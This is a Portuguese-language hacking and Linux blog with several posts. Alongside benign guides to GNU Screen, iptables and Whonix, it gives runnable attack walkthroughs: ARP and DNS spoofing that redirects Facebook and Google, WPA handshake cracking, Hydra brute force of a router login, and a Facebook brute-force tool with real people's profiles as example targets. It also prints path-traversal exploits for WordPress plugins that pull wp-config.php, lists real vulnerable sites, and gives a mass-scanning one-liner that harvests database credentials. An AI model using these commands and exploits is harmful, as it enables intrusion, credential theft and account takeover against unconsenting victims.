segunda-feira, 3 de agosto de 2015

GNU Screen - Linux Terminal

GNU Screen é um aplicativo de software que pode ser usado para multiplex vários consoles virtuais, permitindo que um usuário para acessar várias sessões de terminal separados dentro de uma única janela de terminal ou sessão de terminal remoto. Ele é útil para lidar com vários programas a partir de uma interface de linha de comando, e para a separação programas a partir da shell do Unix que iniciou o programa. Lançado sob os termos da versão 3 ou posterior do GNU General Public License, GNU tela é um software livre Fonte
Comandos
Ctrl + a " Usar Tudo "Ctrl + a , ? " Wiki nomes de chave comando "Ctrl + a , c " Nova Janela "Ctrl + a , n " Proxima Janela "Ctrl + a , p " Janela Anterior "Ctrl + a , Ctrl + a " Muda de janela para anterior "Ctrl + a , TAB " Move para proxima Região "Ctrl + a , Shift + s " Divide o terminal na Região Horizontal " + Ctrl + a , c "Para criar uma nova janela na região"Ctrl + a , Shift + | " Divide o terminal na Região Vertical " + Ctrl + a , c "Para criar uma nova janela na regiã"Ctrl + a , Shift + a " Seta um nome pra Região "Ctrl + a , :remove "Remove uma Regiao"Ctrl + a , Shift + q "Fecha as Regiões mais mantem as janelas abertas." Obs voce usar exit pra fechar todas um por umexit para sair das janelas e fechar o screen

English
Ctrl + a " Use All "Ctrl + a , ? " Wiki - how key bindings/command names "Ctrl + a , c " New window "Ctrl + a , n " Next window "Ctrl + a , p " Previous window "Ctrl + a , Ctrl + a "Previous window viewed"Ctrl + a , TAB "Move to next region"Ctrl + a , Shift + s " Split terminal horizontally into regions " + Use: Ctrl + a , c to create new window thereCtrl + a , Shift + | " Split terminal vertically into regions" + Use: Ctrl + a , c to create new window thereCtrl + a , Shift + a " Set window title "Ctrl + a , :remove " Remove region"Ctrl + a , Shift + q " Exit all region"exit for quit

.screenrc <source>

# as duas linhas seguintes dar um status de duas linhas, com a janela atual em destaque
hardstatus alwayslastline
hardstatus string '%{= kG}[%{G}%H%? %1`%?%{g}][%= %{= kw}%-w%{+b yk} %n*%t%?(%u)%? %{-}%+w %=%{g}][%{B}%m/%d %{W}%C%A%{g}]'

# buffer de rolamento enorme
defscrollback 5000
# Remove menssage de boas-vindas
startup_message off
# 256 cores
attrcolor b ".I"
termcapinfo xterm 'Co#256:AB=\E[48;5;%dm:AF=\E[38;5;%dm'
defbce on

# Permite mudar o foco região clicando com o mouse
mousetrack on
# navegar regiões com Ctrl-setas - | -
bindkey "^[[1;5D" focus left
bindkey "^[[1;5C" focus right
bindkey "^[[1;5A" focus up
bindkey "^[[1;5B" focus down

# alternar rapidamente entre regiões, utilizando guia e setas
bind -c rsz \t eval "focus" "command -c rsz" # Tab
bind -c rsz -k kl eval "focus left" "command -c rsz" # Left
bind -c rsz -k kr eval "focus right" "command -c rsz" # Right
bind -c rsz -k ku eval "focus up" "command -c rsz" # Up
bind -c rsz -k kd eval "focus down" "command -c rsz" # Down


<source> Download Aqui

Referencia:
http://www.pixelbeat.org/lkdb/screen.html

Video

GNU Screen - Linux Terminal from Mathew Thomas on Vimeo.








Read More

quinta-feira, 30 de julho de 2015

MITMf Framework Man-In-The-Middle attacks

O que é um Ataque Man-in-The-Middle

" OBS.. Post Em Edição... "


O man-in-the-middle (pt: Homem no meio, em referência ao atacante que intercepta os dados) é uma forma de ataque em que os dados trocados entre duas partes, por exemplo você e o seu banco, são de alguma forma interceptados, registrados e possivelmente alterados pelo atacante sem que as vitimas se apercebam. Fonte

MITMf é um Framework para ataques Man-In-The-Middle
Esta é uma ferramenta baseada python com vários plugins que adicionam mais funcionalidade (e flexibilidade) à sua rotina de testes de penetração e, assim, torná-lo mais rápido e mais produtivo

Plugins disponíveis:
Spoof  Redirect traffic using ARP Spoofing, DNS Spoofing or ICMP Redirects
BeEFAutorun  Autoruns BeEF modules based on clients OS or browser type
AppCachePoison  Perform app cache poison attacks
BrowserProfiler  Attempts to enumerate all browser plugins of connected clients
CacheKill  Kills page caching by modifying headers
FilePwn  Backdoor executables being sent over http using bdfactory
Inject  Inject arbitrary content into HTML content
JavaPwn  Performs drive-by attacks on clients with out-of-date java browser plugins
jskeylogger  Injects a javascript keylogger into clients webpages
Replace  Replace arbitary content in HTML content
SMBAuth  Evoke SMB challenge-response auth attempts
Upsidedownternet  Flips images 180 degrees
Referência Aqui;

                                      Source && Download
                                          mitmf download
Command:
:~# apt-get update && apt-get install mitmf

Command Basic
:~#  mitmf --spoof --arp --interface eth0 --target 192.168.1.6 --gateway 192.168.1.1

                                   " OBS.. Post Em Edição... "

--interface = Interface de rede eth0/eth1 ou wlan0/wlan1
--target     = Alvo que você deseja spofar
--gateway =  Ip do roteador q você o alvo estao conectados
 

Video:

MITMf Framework Man-In-The-Middle attacks from Mathew Thomas on Vimeo.

Read More

domingo, 5 de julho de 2015

Quebrando Senha de Rede Wi-Fi WPA/WPA2 + MacChanger + Crack HTTP Password Hydra

" Quebrando Senha de Rede Wi-Fi WPA/WPA2 "
" Clonar Mac "
" Quebrando Senha HTTP Modem "
Step 1
$ airmon-ng
Step 2
$ airmon-ng start wlan1
Step 3
$ airodump-ng mon0
Comando "airodump-ng mon0" Salve em um bloco de notas o: BSSID, CHANEL, ESSID.
BSSID = 00:00:00:00:00:00
CH = 00
ESSID = Wiless_Name
Step 4
$ airodump-ng --bssid 00:00:00:00:00:00 -w handhash -c 00 mon0
O Comando "airodump-ng --bssid 00:00:00:00:00:00 -w handhash -c 00 mon0" Salve alguma estacao.
STATION = 00:00:00:00:00:01
Step 5
$ aireplay-ng -0 0 -a 00:00:00:00:00:00 -e Wiless_Name --ignore-negative-one mon0
Step 6
$ aircrack-ng handhash-01.cap -w /usr/share/dirb/wordlists/big.txt 
Trocando o Mac
Step 7
$ ifconfig wlan1 down
$ macchanger --mac 64:89:9A:18:28:03 wlan0
YOUR MAC: 00:00:00:00:00:02 (Name)
Save your mac on Notepad
Step 8
$ ifconfig wlan0 up
Cracking Modem password
Step 9
hydra -l admin -P /usr/share/dirb/wordlists/big.txt -e ns -t 10 -s -vV 192.168.0.1 http-get
Video:

Quebrando Senha de Rede Wi-Fi WPA/WPA2 + MacChanger + Crack HTTP Hydra from Mathew Thomas on Vimeo.


Read More

quarta-feira, 1 de julho de 2015

Kali Linux DNS Spoofing

Awe pessoal hoje vou falar um pouco sobre DNS Spoof;

O que é DNS Spoof?


DNS Spoof é uma técnica em que os hackers usa para redireciona um sites  que as vítimas querem acessar.
A maioria das pessoas que usam páginas fakes fazem isso.

Falsificação de DNS (ou cache DNS envenenamento) é um computador de hackers ataque, segundo o qual os dados são introduzidos em um Domain Name System (DNS) resolver 's de cache , fazendo com que o servidor de nomes para retornar um incorreto endereço IP , desviando o tráfego para o
computador do atacante (ou qualquer outro computador). Fonte: Wikepedia


Comando:

$ echo "1" >> /proc/sys/net/ipv4/ip_forward


$ arpspoof -i wlan0 192.168.0.1

Creie uma Lista ex:

66.135.216.190 *.google.com
66.135.216.190 mail.live.com
66.135.216.190 br.msn.com
66.135.216.190 m.facebook.com
66.135.216.190 www.facebook.com
66.135.216.190 pt-br.facebook.com


$ dnsspoof -i wlan0 -f lista

Video:

Kali Linux DNS Spoofing from Mathew Thomas on Vimeo.

Read More

sábado, 20 de junho de 2015

Como usar o WhatsApp no Computador


Fala Galera do youtube
Aqui é o mathew, e hoje vou aborda um assunto diferente, pra aqueles que curtem pc mais querem ter um WhatsApp nele



Pode ser em:
Sistema Operacional
  Windows
  Linux
  Mac

Requesitos

  VirtualBox    
    -> Download
    -> VMWare não testei
        
   Android-x86   
    -> Download
    -> Baixem essa versao android-x86-4.4-RC2.iso
        
   2 Mouses  
      1 Para seu Host Hospedeiro
      1 Para seu Android
               
   WhatsApp.apk 
     -> Download
       
   Numero telefone
     -> oi, vivo, tim, claro
        Obs: O numero deve esta em um celular comum, para q
        vc possa receber a ligação com o code de confimação
        do whats, insira o code quando vc receber e pronto pode usar o whats normalmente
Faça o Download dos arquivos nescessarios

Instalações

       ¹ Maquina Virtual -> Você ja deve saber disso
       ² Android-x86 ->  Link do Video
       ³ Whatsapp.apk
          -> Obs: O numero deve esta em um celular comum, para q
          -> vc possa receber a ligação com o code de confimação
          -> do whats, insira o code quando vc receber e pronto pode usar o whats normalmente
      
Extras
Galeria de Fotos, nao abre pelo menos pra mim
 -> Pra poder colocar foto no whatsapp instale o cymera e quando for altera a foto abra com o cymera na opção

Reprodutor de Video, da uns legs

Teclado ingles internacional, acentuasções não funciona

Video

Como usar o WhatsApp no Computador from Mathew Thomas on Vimeo.





Read More

segunda-feira, 1 de junho de 2015

Delphi XE7: Executando Automaticamente Aplicação com Privilégios de Administrador

Olá Pessoal,
Neste poste irei mostra como você podem está configurando suas aplicações para ser executada automaticamente com privilégios de administrador, tendo permissão, por exemplo, para alterar o registro do Windows ou enviar alguma coisa para a System32.

Passo 1:
Criando  UAC.manifest
Abra o seu editor de texto de sua preferência, e insira os seguintes códigos XML:
<assembly manifestversion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
  <assemblyidentity name="NOME-DO-SEU-PROJETO.exe" processorarchitecture="*" type="win32" version="3.1.0.0">
  <dependency>
    <dependentassembly>
      <assemblyidentity language="*" name="Microsoft.Windows.Common-Controls" processorarchitecture="*" publickeytoken="6595b64144ccf1df" type="win32" version="6.0.0.0">
    </assemblyidentity></dependentassembly>
  </dependency>
  <trustinfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedprivileges>
        <requestedexecutionlevel level="requireAdministrator" uiaccess="false">
        </requestedexecutionlevel></requestedprivileges>
    </security>
  </trustinfo>
  <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
    <application>
      <!--The ID below indicates application support for Windows Vista -->
      <supportedos id="{e2011457-1546-43c5-a5fe-008deee3d3f0}">
      <!--The ID below indicates application support for Windows 7 -->
      <supportedos id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}">
    </supportedos></supportedos></application>
  </compatibility>
</assemblyidentity></assembly>
Na terceira linha substitua o nome do NOME-DO-SEU-PROJETO.exe pelo nome do Seu-Projeto.exe. Clique em Save As (Salvar Como) e atribua o seguinte nome "UAC.manifest". O arquivo deve ser salvo no mesmo diretório do executável.
















Passo 2:
Criando o UAC.rc
Abra o seu Editor de texto e cole esse código:

1 24 "UAC.manifest"















Clique em Save As (Salvar Como) e atribua o seguinte nome "UAC.rc". Salve, também, este arquivo no mesmo diretório do executável.
















Passo3:
Agora, vamos adicionar este último arquivo ao nosso projeto. No Menu principal do Delphi vá até Project --> Add to Project e selecione o arquivo "UAC.rc".


 
Na TreeView do Project Manager deverá aparecer o arquivo adicionado conforme figura abaixo:
Compile a aplicação. Após o fim da compilação vá até o diretório do executável e verifique se foi criado o arquivo UAC.RES.

















Esse arquivo deve ser usado como opção de inicialização do sistema e é através dele que serão dados os privilégios de rodar como administrador automaticamente. Quando compilamos uma aplicação, ela automaticamente gera um arquivo SeuProjeto.RES que será usado como Manifest inicial. O que iremos fazer é substituir esse arquivo pelo nosso manifest.

Passo 4:
Assim sendo, vá até o Menu Project | Options | Application e onde estiver marcada a opção "Enable RunTime Themes" substitua por "Use Custom Manifest". Logo abaixo aparecerá uma opção para que você selecione o arquivo manifest que deseja utilizar. Selecione o arquivo "UAC.manifest" criado e execute sua aplicação.





































Icone do aplicativo antes:















Icone Depois:














Bom Pessoal é isso, ate a Proxima com mais Delphi XE7

Video Abaixo:


Read More

quinta-feira, 26 de fevereiro de 2015

WeRTC Javascript Bypass Tor vpn


Usuários de VPN estão enfrentando uma falha de segurança enorme, em que sites podem ter acesso facilmente a seus endereços de IP através WebRTC.

A vulnerabilidade é limitado a navegadores de suporte, Firefox e Chrome, e parece afetar apenas os usuários do Windows. Felizmente a falha de segurança é relativamente fácil de corrigir.

WebRTC é uma API em desenvolvimento elaborada pela World Wide Web Consortium (W3C) para permitir aos navegadores executar aplicações de chamada telefônica, video chat e compartilhamento P2P sem a necessidade de plugins.

Revelações feitas pelo Snowden, deixaram claro que a privacidade on-line não é, certamente, um dado adquirido.

Apenas alguns dias atrás, nós vimos que o Governo canadense rastreia visitantes de dezenas de sites de compartilhamento de arquivo populares.

Como essas histórias fazem manchetes em tem todo o interesse mundial em serviços de anonimato, tais como VPNs tem aumentado, como até mesmo os usuários regulares da Internet não gosta da idéia de ser espionado.

Infelizmente, até mesmo os melhores serviços de VPN não podem garantir que ser 100% de segurança. Nesta semana, uma muito preocupante falha de segurança revelou que é fácil de ver os verdadeiros endereços IP de muitos usuários de VPN através de um recurso WebRTC.

Com algumas linhas de código, sites podem fazer solicitações para atordoar os servidores e log VPN IP-address dos usuários e o "hidden" home IP-address IP, bem como endereços de rede local.

A vulnerabilidade afeta navegadores WebRTC de suporte, Firefox e Chrome e parece estar limitada a máquinas Windows.

A demo publicada no GitHub pelo desenvolvedor Daniel Roesler permite que as pessoas possam verificar se são afetados pela falha de segurança.

DEMO: github.com/diafygi/webrtc-ips
TESTE AQUI: diafygi.github.io/webrtc-ips

Tutorial Completo Aqui
 
Read More

Wordpress Revolution Slider Local File Disclosure

Wordpress Revolution Slider Local File Disclosure
Nesse tutorial mostro como vocês pode obter dados do mysql dos servidores vulneravel, ("E-Commerce") usando a google inurlbr para fazer as busca e deixando tudo organizado no bloco de notas, tambem fazendo uma verificação na posta do servidor, a porta 3306 a qual usaremos para nos conectar nor servidor, e assim tendo acesso a tabela de usuarios do wordpress, podendo fazer update da senha e colocando a nossa e assim logamos no painel.
[+] Titulo: Wordpress slider reolusion local file download
[+] Data: 25-01-2015
[+] Author: JOK3R
[+] Site Vendedor: https://wordpress.org/plugins/patch-for-revolution-slider/
[+] Testado em: windows 7 / firefox , kali linux / firefox
[+] Arquivos Vulneravel: /plugins/revolution-slider/
[+] Dork : "Index of" /wp-content/plugins/revolution-slider/
POC:
http://victim/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
Demo:
http://www.bungaburgerbar.com/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
http://www.peanut215.com/peanut/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
http://www.pro-businesscenter.com/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
Creditos:
Special Thanks: Sheytan Azzam - Mohamad NOfozi - Root3r - Sina_lizard - Ali Ahmady - iliya Norton - Mr.Moein* - ALIREZA_PROMIS*
And All iranian Hacker's And Exploiter's <3
[+] iran-cyber.in 
Sobre SCANNER - INURLBR
GRUPO GOOGLEINURL BRASIL - PESQUISA AVANÇADA.
SCRIPT NAME: INURLBR
AUTOR: Cleiton Pinheiro
Nick: Googleinurl
Blog: http://blog.inurl.com.br
twitter: /@googleinurl
facebook: /InurlBrasil Download: Script
Outras  Informações
Na Busca vamos usar a "Google InurlBR" que faz toda a busca de forma rapida e facil. Junto como o comando do NMAP, para verificar a porta 3306 se está aberta. (OBS, "Não significa a porta esteja aberta que você consiga entrar no MYSQL. Algums Servidores, devem está configurado para não acessa remotamente o servidor do MYSQL")

Busca Avançada com InurlBr + Nmap
Mude aqui para outros dominios em = site:br, site:com, site:uk... etc
Crie um pasta na sua area de trabalho com o nome  " output " ou remova o caminho

Comando InurlBR
root@kali:~# php inurlbr.php --dork '"Index of" /wp-content/plugins/revolution-slider site:br' -q 1,6 -s ~/Desktop/output/wp-out.txt --exploit-get '/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php' -t 3 --exploit-comand '/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php' --comand-vul 'nmap -Pn -p 3306 _TARGET_' --comand-all 'echo "_TARGET__EXPLOIT_">> ~/Desktop/output/wp-out-curl.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> ~/Desktop/output/wp-out-curl.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"'
Video:

Wordpress_Revolution_Slider_Local_File_Disclosure - ECommerce from Mathew Thomas on Vimeo.

https://youtu.be/5rvOuPGLwuk?t=4m48s
Read More

quarta-feira, 25 de fevereiro de 2015

Como instalar o KaliLinux na Virtualbox com Whonix gateway UPADATE

UPDATE
Como instalar o KaliLinux na Virtualbox com Whonix gateway

Antes que possamos começar, certifique-se de fazer o download dos componentes necessários.

Downloads:
Virtualbox: https://www.virtualbox.org/wiki/Downloads
Para o Linux (Ubuntu/Debian) os usuários digite:
step 1: sudo apt-get install linux-headers-$(uname -r)
step 2: sudo apt-get update && sudo apt-get install virtualbox
ou fazer download nesse link: https://www.virtualbox.org/wiki/Linux_Downloads -> All distributions  i386 or  AMD64

Whonix Gateway:

2 Click em novo ou new, nao sei como ta seu idioma, no meu caso ér new mesmo, dou prefencia por meu OS instalação em ingles
3 Digite o nome desejado: Kali Linux, Tipo: Linux, Versão: Debian (se você está instalando a versão de 64 bits, por favor, selecione "Debian (64 bits)") e clique em Avançar ou Next.
4 Escolha a quantidade de memoria RAM que deve ser usado. Eu recomendo 1512MB. Avançar ou Next.
5 Basta clicar em Criarou Create.
6 Selecione VDI (VirtualBox Imagem de Disco) e clique novamente em Avançar ou Next.
7 Apenas clique em Avançar ou Next.
8 Mude o disco para 25 GB e clique em Criar ou Create
9 Clique em Sistema e certifique-se de relógio de hardware em tempo UTC é selecionado.
10 Clique na guia Processador ou Processor e certifique-se de Habilitar PAE/NX é marcado (se disponível).
11 Click em Rede ou Network.
 12 Clique no Attached to: (NAT) e selecione Rede Interna ou Internal Network.
13 Certifique-se de Whonix é selecionado. e clique em OK.
14 Click em Armazenamento ou Storage.
15 Selecione vazio, o símbolo de CD/DVD, e escolher um arquivo de disco de CD/DVD virtuais ... Navegue até a achar a imagem ISO do kali-linux e selecioná-lo. Clique em OK
16 Selecione USB e desmarque Habilitar controlador USB ou Enable USB Controller.
17 Click em Iniciar ou Start.
18 Selecione instalar modo gráfico ou Graphical install e aperte enter.
19 Selecione em Inglês ou o idioma desejado (tutorial está em Inglês). Clique em Continuar.
20 Selecione a sua localização. Clique em Continuar.
21 Configure o teclado (selecione o seu de teclado Brazilian) e clique em Continuar. Agora, a instalação começara e configuração auto da rede irá aparecer falhar na auto configuração. tudo bem. Clique em Continuar.

22 Seleccione Configurar rede manualmente e clique em Continuar.
23 Digite o endereço IP: 192.168.0.20/24 e clique em Continuar.
24 Digite 192.168.0.10 IP do Gateway e clique em Continuar.
25 O endereço do nome do servidor é  192.168.0.10 ... clique em Continuar.
26 Escolheu o nome do host NOME DO COMPUTADOR (para o tutorial eu estou bem com kali). Clique em Continuar.
27 Nome de domínio: Basta deixá-lo em branco e clique em Continuar.
28 Digite a senha do usuario root e digitá-lo novamente. Clique em Continuar.
29 Selecione o seu fuso horário. IMPORTANTE! Não use a sua verdadeira localização/fuso horário.
30 Método de particionamento: Faça como quiser. (para este tutorial eu uso - usar o disco inteiro). Clique em Continuar.
Ver mais em: aqui
31 Basta clicar em Continuar.
32 Basta clicar em Continuar. (Todos os arquivos em uma partição)
33 Basta clicar em Continuar. (Terminar particionamento e escrever as alterações no disco)
34 Selecione Sim e clique em Continuar.
35 Agora é a hora para o café/cerveja ou qualquer outra coisa!! :) Prefiro cerveja. se vc ér demenor vá comer sucrilos com leite depois tome um Activia, sei la, foda-se
36 Basta clicar em Continue (Use um espelho de rede?/Use a network mirror? = Não/No)
37 Instalar o GRUB boot ... Sim e clique em Continuar.
38 Instalação concluída. Clique em Continuar, Instalação terminará eo sistema irá reiniciar (que pode demorar alguns minutos.)

Ok. Agora você tem Kali Linux instalado através do Whonix Gateway.

Se você quiser instalar o VirtualBox Guest Additions por favor certifique-se de ler este primeiro. Aqui $$ Aqui

Lembre-se. Não é 100% provar de bala e pode ser rastreada. Para mais privacidade/anonimato ler Aqui

Bem, não foi tão difícil e eu espero que você goste.

UPADATE IPS
root@kali:~# cat /etc/network/interfaces
# This file describes the network interfaces available on your system 
# and how to activate them. For more information, see interfaces(5). 
# The loopback network interface
auto lo
iface lo inet loopback 
# The primary network interface
allow-hotplug eth0
iface eth0 inet static 
#----------------Whonix-Gateway---------------------------------------------
 address 10.152.152.50
 netmask 255.255.255.0 
 network 10.152.152.0 
 broadcast 10.152.152.255
 gateway 10.152.152.10 
# dns-* options are implemented by the resolvconf package, if installed 
 dns-nameservers 10.152.152.10 


root@kali:~# cat /etc/resolv.conf
nameserver 10.152.152.10

Read More

sábado, 21 de fevereiro de 2015

Wordpress Redsteel Theme File Disclosure

Wordpress Redsteel Theme File Disclosure

[*] Exploit Title: Wordpress RedSteel Theme Arbitrary File Download Vulnerability
[*] Google Dork: inurl:wp-content/themes/RedSteel
[*] Date : Date: 2015-01-25
[*] Exploit Author: Ashiyane Digital Security Team
[*] Vendor Homepage : http://www.webdesignlessons.com/redsteel-wordpress-theme/
[*] Tested on: Windows 7
[*] Discovered By : ACC3SS

Location:
[localhost]/wp-content/themes/RedSteel/download.php?file=filename.php

Vulnerable code file : download.php

<?php
$file = @$_GET['file'];
$parts = explode('/',$file);
$fileName = $parts[sizeof($parts)-1];
if ((isset($file))&&(file_exists($file))) {
  header("Content-type: application/force-download");
  header('Content-Disposition: inline; filename="' . $fileName . '"');
  header("Content-Transfer-Encoding: Binary");
  header("Content-length: ".filesize($file));
  header('Content-Type: application/octet-stream');
  header('Content-Disposition: attachment; filename="' . $fileName . '"');
  readfile($file);
}
?>

Proof:
http://dixonpest.com/wp-content/themes/RedSteel/download.php?file=../../../wp-config.php
http://rmhctallahassee.org/wp-content/themes/RedSteel/download.php?file=download.php


lllllllllllllllllllldjjjjjjjjjjjjjjjjj







Read More

quinta-feira, 19 de fevereiro de 2015

Script em Python para Brute Force em Facebook

Script em python, para brute force em contas de facebook, para você ter sucesso na quebra, você deve criar uma boa lista de senhas.

Esta ferramenta pode quebrar contas de facebook, mesmo se você não tem o e-mail de sua vitima
Use www.graph.facebook.com/nome_vitima para mais infos sobre sua vitima
Exemplo1:
http://graph.facebook.com/yasmin.moratti7
{
   "id": "100003076495801",
   "first_name": "Yasmin",
   "gender": "female",
   "last_name": "Moratti",
   "locale": "pt_BR",
   "name": "Yasmin Moratti",
   "username": "yasmin.moratti7"
}
Exemplo2:
http://graph.facebook.com/oliveirarayssa123 
{
   "id": "100003629418208",
   "first_name": "Anna",
   "gender": "female",
   "last_name": "Rayssa",
   "link": "https://www.facebook.com/oliveirarayssa123",
   "locale": "pt_BR",
   "name": "Anna Rayssa",
   "username": "oliveirarayssa123"
}

"Cracker Facebook Version 2 pode quebrar  banco de dados  em Facebook 100% sem interrupção pelo Firewall do Facebook !
Esta Programa é apenas para fins educacionais.

Não use sem que a pessoa saiba isso é ilegal!
Se você quer quebrar a conta de alguém, você deve ter a permissão do usuário.

O Autor e eu, não somos responsável pelo o mau uso da ferramenta.
Apenas compartinhando conhecimentos"

INSTRUÇÃO
Passo 1
# apt-get install python-mechanize

Passo 2
# python facebook-pt-br.py

Download Ferramentas:
Português: Aqui
Inglês: Aqui

Video Tutorial:
Autor Video: Limon Tec
Blogger: Limon Tec


Look here:
Anna Rayssa





Read More

sábado, 14 de fevereiro de 2015

Iptables Básico

O Firewall é um programa que como objetivo proteger a máquina contra acessos indesejados, tráfego indesejado, proteger serviços que estejam rodando na máquina e bloquear a passagem de coisas que você não deseja receber (como conexões vindas da Internet para sua segura rede local, evitando acesso aos dados corporativos de uma empresa ou a seus dados pessoais). No kernel do Linux 2.4, foi introduzido o firewall iptables (também chamado de netfilter) que substitui o ipchains dos kernels da série 2.2. Este novo firewall tem como vantagem ser muito estável (assim como o ipchains e ipfwadm), confiável, permitir muita flexibilidade na programação de regras pelo administrador do sistema, mais opções disponíveis ao administrador para controle de tráfego, controle independente do tráfego da rede local/entre redes/interfaces devido a nova organização das etapas de roteamento de pacotes.
O iptables é um firewall em nível de pacotes e funciona baseado no endereço/porta de origem/destino do pacote, prioridade, etc. Ele funciona através da comparação de regras para saber se um pacote tem ou não permissão para passar. Em firewalls mais restritivos, o pacote é bloqueado e registrado para que o administrador do sistema tenha conhecimento sobre o que está acontecendo em seu sistema.
Ele também pode ser usado para modificar e monitorar o tráfego da rede, fazer NAT (masquerading, source nat, destination nat), redirecionamento de pacotes, marcação de pacotes, modificar a prioridade de pacotes que chegam/saem do seu sistema, contagem de bytes, dividir tráfego entre máquinas, criar proteções anti-spoofing, contra syn flood, DoS, etc. O tráfego vindo de máquinas desconhecidas da rede pode também ser bloqueado/registrado através do uso de simples regras. As possibilidades oferecidas pelos recursos de filtragem iptables como todas as ferramentas UNIX maduras dependem de sua imaginação, pois ele garante uma grande flexibilidade na manipulação das regras de acesso ao sistema, precisando apenas conhecer quais interfaces o sistema possui, o que deseja bloquear, o que tem acesso garantido, quais serviços devem estar acessíveis para cada rede, e iniciar a construção de seu firewall. O iptables ainda tem a vantagem de ser modularizável, funções podem ser adicionadas ao firewall ampliando as possibilidades oferecidas.
Um firewall não funciona de forma automática (instalando e esperar que ele faça as coisas por você), é necessário pelo menos conhecimentos básicos de rede tcp/ip, roteamento e portas para criar as regras que farão a segurança de seu sistema. A segurança do sistema depende do controle das regras que serão criadas por você, as falhas humanas são garantia de mais de 95% de sucesso nas invasões.
Enfim o iptables é um firewall que agradará tanto a pessoas que desejam uma segurança básica em seu sistema, quando administradores de grandes redes que querem ter um controle minucioso sobre o tráfego que passam entre suas interfaces de rede (controlando tudo o que pode passar de uma rede a outra), controlar o uso de tráfego, monitoração, etc.
Fonte: guiafoca.org
O Linux utiliza um recurso independente em termos de kernel para controlar e monitorar todo o tipo de fluxo de dados dentro de sua estrutura operacional. Mas não o faz sozinho, pois sua função deve ser a de trabalhar ao lado de processos e tarefas tão somente.
Para que o kernel pudesse então controlar seu próprio fluxo interno lhe fora agregada uma ferramenta batizada de netfilter.
Criado por Marc Boucher, James Morris, Harald Welte e Rusty Russell, o netfilter é m conjunto de situações de fluxo de dados agregadas inicialmente ao kernel do Linux e dividido em tabelas.
Sob uma ótica mais pratica podemos ver o netfilter como um grande bando de dados que contem em sua estrutura 3 tabelas padrões: Filter, Nat e Mangle. Cada uma destas tabelas contem regras direcionadas a seus objetivos básicos. A tabela filter por exemplo guarda todas as regras aplicadas a um firewall filtro de pacotes, a tabela Nat das regras direcionadas a um Firewall Nat e a Mangle a funções mais complexas de tratamento de pacotes como o TOS.
Todas as tabelas possuem situações de fluxo (entrada, saída, redirecionamento, etc.) que lhes proporcionam a realização de seus objetivos.

Tabela Filter
 É a tabela padrão do Netfilter e trata das situações implementadas por um Firewall filtro de pacotes. Estas situações são:
INPUT
Tudo o que entra no host.
FORWARD
Tudo o que chega ao host mas deve ser redirecionado a um host secundário ou outra interface de rede.
OUTPUT
Tudo o que sai do host.
Tabela NAT
Esta tabela implementa funções de NAT (Networ Address Translation) ao host Firewall. O Nat por sua vez, possui diversas utilidades, conforme abordado anteriormente. Suas situações são:
PREROUTING
Utilizada quando há necessidade de se fazer alterações em pacotes antes mesmo que sejam roteados.
OUTPUT
Trata os pacotes emitidos pelo host Firewall.
POSTROUTING
Utilizado quando há necessidade de se fazer alterações em pacotes após o tratamento de roteamento.
Tabela Mangle
Implementa alterações especiais em pacotes em um nível mais complexo. A tabela Mangle é capaz por exemplo de alterar a prioridade de entrada e saída de um pacote baseado no tipo de serviço (TOS) o qual o pacote se destinava, Suas situações são:
PREROUTING
Modifica pacotes dando-lhes em tratamento especial antes que os mesmos sejam roteados.
OUTPUT
Altera pacotes de forma especial gerados localmente antes que os mesmos sejam roteados.
AS prioridades são:
Espera mínima                                 16 ou 0x10
Maximo processamento                     8 ou 0x08
Máxima confiança                              4 ou 0x04
Custo mínimo                                    2 ou 0x02
Prioridade normal                              0 ou 0x00
Parâmetros
-A = Adiciona uma nova entrada ao fim da lista de regras.
-D = Apaga um regra especificada da lista.
-L = Lista as regras existentes na lista.
-P = Altera a política padrão das chains.
-F = Remove todas as entradas adicionadas na lista.
-I = Insere uma nova regra ao inicio da lista de regras.
-R = Substitui uma regra já adicionada.
-N = Cria uma nova chain a tabela especificada.
-E = Renomeia uma chain criada anteriormente.
-X = Apaga uma chain.
-p =Especifica o protocolo aplicado a regra, pode ser qualquer valor numérico especificado no arquivo /etc/protocol ou o próprio nome do protocolo (tcp, udp, icmp, etc...).
-i = Especifica a interface de entrada a ser utilizada.
-o = Especifica a interface de saída a ser utilizada.
-s = Especifica a origem (source) do pacote ao qual a regra deve ser aplicada.
-d = Especifica o destino do pacote (destination) ao qual a regra deve ser aplicada.
! = Significa exclusão e é utilizada quando se deseja aplicar uma exceção a uma regra.
-j = Define o alvo (target) do pacote caso o mesmo se encaixe a uma regra.
--sport = Porta de origem.
--dport = Porta de destino.
ACCEPT = Aceita a passagem do pacote.
DROP = Descarta o pacote.
REJECT = Rejeita o pacote.
LOG = Cria uma entrada de log no arquivo /var/log/messages
RETURN = Retorna o processamento do chain anterior sem processar o resto do chain atual.
QUEUE = Encarrega um pograma em nível de usuário de administrar o processamento de fluxo atribuído ao mesmo.
SNAT = Altera a origem das maquinas clientes antes dos pacotes serem roteados.
DNAT = Altera o destino das maquinas clientes.
REDIRECT = Realiza o redirecionamento de portas.
TOS = Prioriza a entrada e saída de pacotes baseados em seu tipo de serviço.
Exemplos
Lista as regras na lista da tabela Filter.
# iptables -L
Lista as regras na lista da tabela Nat.
# iptables -t nat -L
Lista as regras na lista da tabela Mangle.
# iptables -t mangle -L
Define a política padrão DROP da da chain INPUT.
# iptables -P INPUT DROP
Define a política padrão DROP da da chain OUTPUT.
# iptables -P OUTPUT DROP
Define a política padrão DROP da da chain FORWARD.
# iptables -P FORWARD  DROP
Libera o trafego na interface de loopback
# iptables -A INPUT -i lo -j ACCEPT
Proibe a rede 192.168.0.0/24 acessar o dominio sex.com.br
# iptables -A FORWARD -s 192.168.0.0/24 -d www.sex.com.br -j DROP
Rejeita pacotes vindos do ip 200.200.100.44 para a rede 192.168.0.0/24.
